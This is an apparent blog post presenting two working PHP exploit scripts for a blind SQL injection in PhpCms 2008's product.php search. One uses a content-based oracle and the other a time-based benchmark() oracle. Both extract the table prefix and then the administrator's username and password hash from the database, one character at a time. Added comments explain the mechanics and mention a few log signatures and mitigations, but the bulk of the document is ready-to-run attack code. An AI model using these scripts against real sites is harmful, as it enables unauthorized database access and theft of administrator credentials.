phpcms 2008 yp.php 0day exp

2010年5月23日星期日

文章作者:my5t3ry

第一个EXP:

<?php
// Lift the execution-time limit: the script below sends one HTTP request per
// candidate character, so it runs far longer than the default limit allows.
ini_set("max_execution_time",0);
// 7 == E_ERROR | E_WARNING | E_PARSE. E_NOTICE (8) is excluded, so the
// undefined-variable / undefined-offset notices this code triggers (e.g.
// `$reply .=` on a never-initialised variable, `$match[1]` on a failed match)
// are silently dropped rather than reported.
error_reporting(7);

// Print the banner and usage text, then terminate; exit() never returns.
// Reads the global $argv only to show the script's own name in the usage line.
function usage()
{
    global $argv;
    exit(
        "\n--+++============================================================+++--".
        "\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit&nbsp;&nbsp;========+++--".
        "\n--+++============================================================+++--".
        "\n\n[+] Author&nbsp; &nbsp;: My5t3ry".
        "\n[+] Team&nbsp; &nbsp;&nbsp;&nbsp;: [url]http://www.t00ls.net[/url]".
        "\n[+] Usage&nbsp; &nbsp; : php ".$argv[0]." <hostname> <path>".
        "\n[+] Ex.&nbsp; &nbsp;&nbsp; &nbsp;: php ".$argv[0]." localhost /yp".
        "\n\n");
}

// Build the value sent in the `where` POST parameter for a single probe.
//
// $chs selects the SQL fragment; the page's author identifies `where` as the
// point at which it reaches the application's query unescaped:
//   0 -> "#" only: comments out the remainder of the query (getprefix() relies
//        on the response then containing the raw SQL text),
//   1 -> true iff the byte at $pos of the first groupid=1 username equals $chr,
//   2 -> the same test against the password column,
//   3 -> true iff the length of that username equals $pos ($chr unused).
// $prefix is the table prefix discovered by getprefix() (global, set in the
// script body). Any other $chs leaves $query unset.
//
// Spaces are swapped for inline SQL comment tokens before URL-encoding; the
// resulting encoded sequence in the `where` field is a usable access-log
// signature for this tool, as is a burst of searchlist POSTs from one client.
function query($pos, $chr, $chs)
{
    global $prefix;
    switch ($chs){
        case 0:
            $query = "#";
        break;
        case 1:
            $query = " ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";
        break;
        case 2:
            $query = " ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";
        break;
        case 3:
            $query = " length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}#";
        break;
    }
    // Space -> comment-token substitution, then percent-encode for the form body.
    $query = str_replace(" ", "/**/", $query);
    $query = urlencode($query);
    return $query;
}

// Send one probe as a POST to <path>/product.php and return the raw HTTP
// response (status line, headers and body concatenated).
//
// $chr is converted with ord() so query() receives the byte value to compare.
// The request imitates an MSIE 6 browser; the body is
// q=&action=searchlist&where=<probe>, and the reply is read until EOF.
//
// Code-level observations (left unchanged):
//  - the fsockopen() result is never checked (the check is commented out), so
//    a failed connection proceeds into fputs()/feof() on `false`;
//  - $reply is appended to before being initialised; the notice is hidden by
//    error_reporting(7) at the top of the file.
function exploit($hostname, $path, $pos, $chr, $chs)
{
    $chr = ord($chr);
    $conn = fsockopen($hostname, 80);
    //print_r($conn);
    /*if (!$conn){
        exit("\r\n[-] No response from $conn");
    }*/

    $postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);
    $message = "POST ".$path."/product.php HTTP/1.1\r\n";
    $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "Accept-Encoding: gzip, deflate\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $hostname\r\n";
    $message .= "Content-Length: ".strlen($postdata)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $postdata;
    //echo $message;

    fputs($conn, $message);
    // Accumulate the whole reply; "Connection: Close" lets feof() terminate it.
    while (!feof($conn))
        $reply .= fgets($conn, 1024);

    fclose($conn);
    return $reply;
}

// Recover the username one character at a time (boolean/content-based blind).
//
// Walks positions 1..$length ($length is a global set from lengthcolumns() in
// the script body) and, for each position, tries the characters of $key in
// order. A probe is taken as "true" when the response contains a non-empty
// <span class="time">...</span></strong> element, i.e. the search page rendered
// a result row; on a miss $match[1] is unset, strlen(trim()) yields 0 and the
// branch is treated as false (the notice is suppressed by error_reporting(7)).
// $chr is not bounded by strlen($key). Characters are echoed as found.
function crkusername($hostname, $path, $chs)
{
    global $length;
    $key = "abcdefghijklmnopqrstuvwxyz0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] username: ";
    while ($pos <= $length)
    {
        $response = exploit($hostname, $path, $pos, $key[$chr], $chs);
        preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

        if (strlen(trim($match[1])) != 0)
        {
            // Match: emit the character and restart the alphabet at the next position.
            echo $key[$chr];
            $chr = 0;
            $pos++;
        }
        else
            $chr++;
    }
    echo "\n";
}

// Recover the stored password value, 32 positions over the lowercase hex
// alphabet (the shape of a hex digest; the hashing scheme itself is not
// visible here). Same oracle as crkusername(): a non-empty
// <span class="time">...</span></strong> in the response means "true".
// What an attacker obtains is bounded by how the column is stored — a salted,
// slow hash limits the value of a recovered digest; a fast unsalted one does not.
function crkpassword($hostname, $path, $chs)
{
    $key = "abcdef0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] password: ";
    while ($pos <= 32)
    {
        $response = exploit($hostname, $path, $pos, $key[$chr], $chs);
        preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

        if (strlen(trim($match[1])) != 0)
        {
            echo $key[$chr];
            $chr = 0;
            $pos++;
        }
        else
            $chr++;
    }
    echo "\n\n";
}

// Determine the username length by probing $pos = 1, 2, 3, ... with the
// length() comparison (case 3 of query()); $chr is passed but unused by that
// case. Stops at the first position whose response contains the non-empty
// <span class="time"> element and returns it (0 is never returned because the
// loop only exits on a match). Echoes the value as well.
function lengthcolumns($hostname, $path, $chs)
{
    echo "[+] username length: ";
    $exit = 0;
    $length = 0;
    $pos = 1;
    $chr = 0;
    while ($exit==0)
    {
        $response = exploit($hostname, $path, $pos, $chr, $chs);
        preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

        if (strlen(trim($match[1])) != 0)
        {
            $exit = 1;
            $length = $pos;
        }
        else
            $pos++;
    }
    echo $length."\n";
    return $length;
}

// Discover the database table prefix.
//
// Sends one probe with $chs = 0 (the bare "#" payload) and searches the
// response for "FROM `<prefix>yp_product": this only works because the page
// echoes its SQL text back to the client. From a defender's side that echo is
// the information disclosure to remove (no verbose DB errors in production);
// without it the rest of the script has no prefix to work with.
// Returns the captured prefix, or false when nothing matched.
function getprefix($hostname, $path, $chs)
{
    echo "[+] prefix: ";
    $pos = 0;
    $chr = 0;
    $response = exploit($hostname, $path, $pos, $chr, $chs);
    preg_match('/FROM `(.+)yp_product/ie',$response,$match);

    if ($match[1])
        return $match[1];
    else
        return false;
}


// Script body: <hostname> <path> from the command line, then
// prefix -> username length -> username -> password, in that order.
// $prefix and $length are module-level globals read by query() and
// crkusername() respectively.
if ($argc != 3)
    usage();
$prefix="";
$hostname = $argv[1];
$path = $argv[2];
$prefix = getprefix($hostname, $path, 0);
if ($prefix)
{
    echo $prefix."\r\n";
    $length = lengthcolumns($hostname, $path, 3);

    crkusername($hostname, $path, 1);
    crkpassword($hostname, $path, 2);
}
else
{
    // No prefix could be extracted from the response, so nothing further is attempted.
    exit("\r\n[-] Exploit failed");
}

?>

第二个EXP:

<?php
// No execution-time limit: this variant waits for deliberately slow responses,
// so a single run can take many minutes.
ini_set("max_execution_time",0);
// 7 == E_ERROR | E_WARNING | E_PARSE; E_NOTICE is excluded, which hides the
// `$reply .=` on an uninitialised variable in exploit() and getprefix().
error_reporting(7);

// Print the banner and usage text, then terminate; exit() never returns.
// Identical to the first script's usage(); reads the global $argv for the
// script name only.
function usage()
{
    global $argv;
    exit(
        "\n--+++============================================================+++--".
        "\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit&nbsp;&nbsp;========+++--".
        "\n--+++============================================================+++--".
        "\n\n[+] Author&nbsp; &nbsp;: My5t3ry".
        "\n[+] Team&nbsp; &nbsp;&nbsp;&nbsp;: [url]http://www.t00ls.net[/url]".
        "\n[+] Usage&nbsp; &nbsp; : php ".$argv[0]." <hostname> <path>".
        "\n[+] Ex.&nbsp; &nbsp;&nbsp; &nbsp;: php ".$argv[0]." localhost /yp".
        "\n\n");
}

// Build the `where` value for a single time-based probe.
//
// Unlike the first script, every fragment is of the form
// 1=1 and if(<condition>, benchmark(10000000,md5(1)), 1)#
// so a true condition makes MySQL burn CPU for several seconds and a false one
// returns immediately; exploit() measures that delay instead of inspecting the
// page content. $chs selects the condition:
//   1 -> byte $pos of the first groupid=1 username equals $chr,
//   2 -> the same for the password column,
//   3 -> length of that username equals $pos ($chr unused).
// $prefix is the global table prefix from getprefix(); there is no case 0 here.
// Detection note: each true probe shows up server-side as a seconds-long
// benchmark() query (slow-query log / processlist), and the encoded
// comment-token sequence in `where` is visible in access logs.
function query($pos, $chr, $chs)
{
    global $prefix;
    switch ($chs){
        case 1:
            $query = "1=1 and if((ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";
        break;
        case 2:
            $query = "1=1 and if((ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";
        break;
        case 3:
            $query = "1=1 and if((length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}),benchmark(10000000,md5(1)),1)#";
        break;
    }
    // Space -> comment-token substitution, then percent-encode for the form body.
    $query = str_replace(" ", "/**/", $query);
    $query = urlencode($query);
    return $query;
}

// Send one probe and report whether the server took noticeably long to answer.
//
// Same POST to <path>/product.php as the first script, but the reply content is
// discarded: the wall-clock time from before fputs() until EOF is measured with
// time() (whole-second resolution) and the probe is "true" when it exceeds 4 s.
// Network latency and server load therefore feed directly into the result.
//
// Code-level observations (left unchanged): the fsockopen() result is not
// checked, and $reply is appended to before being initialised (notice hidden by
// error_reporting(7)).
function exploit($hostname, $path, $pos, $chr, $chs)
{
    $chr = ord($chr);
    $conn = fsockopen($hostname, 80);

    $postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);
    $message = "POST ".$path."/product.php HTTP/1.1\r\n";
    $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "Accept-Encoding: gzip, deflate\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $hostname\r\n";
    $message .= "Content-Length: ".strlen($postdata)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $postdata;
    //echo $message;

    // Timer starts before the request is written.
    $time_a = time();

    fputs($conn, $message);
    while (!feof($conn))
        $reply .= fgets($conn, 1024);

    // Timer stops once the server has closed the connection.
    $time_b = time();

    fclose($conn);
    //echo $time_b - $time_a."\r\n";

    // Threshold in whole seconds; chosen against benchmark(10000000,md5(1)).
    if ($time_b - $time_a > 4)
        return true;
    else
        return false;
}

// Recover the username one character at a time using the timing oracle.
//
// Positions 1..$length ($length is a global set from lengthcolumns() in the
// script body); for each position the characters of $key are tried in order
// until exploit() reports a slow response. $chr is not bounded by strlen($key).
// Found characters are echoed as they are confirmed.
function crkusername($hostname, $path, $chs)
{
    global $length;
    $key = "abcdefghijklmnopqrstuvwxyz0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] username: ";
    while ($pos <= $length)
    {
        if (exploit($hostname, $path, $pos, $key[$chr], $chs))
        {
            // Slow reply: accept the character, restart the alphabet at the next position.
            echo $key[$chr];
            $chr = 0;
            $pos++;
        }
        else
            $chr++;
    }
    echo "\n";
}

// Recover the stored password value over 32 positions of the lowercase hex
// alphabet (hex-digest shape; the hashing scheme is not visible here), using
// the same timing oracle as crkusername(). A salted, slow password hash limits
// what a recovered digest is worth; a fast unsalted one does not.
function crkpassword($hostname, $path, $chs)
{
    $key = "abcdef0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] password: ";
    while ($pos <= 32)
    {
        if (exploit($hostname, $path, $pos, $key[$chr], $chs))
        {
            echo $key[$chr];
            $chr = 0;
            $pos++;
        }
        else
            $chr++;
    }
    echo "\n\n";
}

// Determine the username length by probing $pos = 0, 1, 2, ... with the
// length() comparison (case 3 of query()) until exploit() reports a slow
// response; $chr is passed but unused by that case. Note the first script's
// version starts at $pos = 1 while this one starts at 0. Echoes and returns
// the value; the loop only exits on a match.
function lengthcolumns($hostname, $path, $chs)
{
    echo "[+] username length: ";
    $exit = 0;
    $length = 0;
    $pos = 0;
    $chr = 0;
    while ($exit==0)
    {
        if (exploit($hostname, $path, $pos, $chr, $chs))
        {
            $exit = 1;
            $length = $pos;
        }
        else
            $pos++;
    }
    echo $length."\n";
    return $length;
}

// Discover the database table prefix with a plain GET (no timing involved).
//
// Requests <path>/product.php?q=&action=searchlist&where=%23 (%23 is "#") and
// searches the reply for "FROM `<prefix>yp_product". As in the first script,
// this depends on the page echoing its raw SQL to the client; suppressing
// verbose database error output removes that disclosure.
// $reply is appended to before being initialised (notice hidden by
// error_reporting(7)). Returns the captured prefix, or false.
function getprefix($hostname, $path)
{
    echo "[+] prefix: ";
    $conn = fsockopen($hostname, 80);
    $request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";
    $request .= "Host: {$hostname}\r\n";
    $request .= "Connection: Close\r\n\r\n";
    fputs($conn, $request);
    while (!feof($conn))
        $reply .= fgets($conn, 1024);

    fclose($conn);
    preg_match('/FROM `(.+)yp_product/ie',$reply,$match);

    if ($match[1])
        return $match[1];
    else
        return false;
}


// Script body: <hostname> <path> from the command line, then
// prefix -> username length -> username -> password. $prefix and $length are
// module-level globals read by query() and crkusername() respectively.
if ($argc != 3)
    usage();
$prefix="";
$hostname = $argv[1];
$path = $argv[2];
$prefix = getprefix($hostname, $path);
if ($prefix)
{
    echo $prefix."\r\n";
    $length = lengthcolumns($hostname, $path, 3);

    crkusername($hostname, $path, 1);
    crkpassword($hostname, $path, 2);
}
else
{
    // No prefix could be extracted from the response, so nothing further is attempted.
    exit("Exploit failed");
}

?>

 
 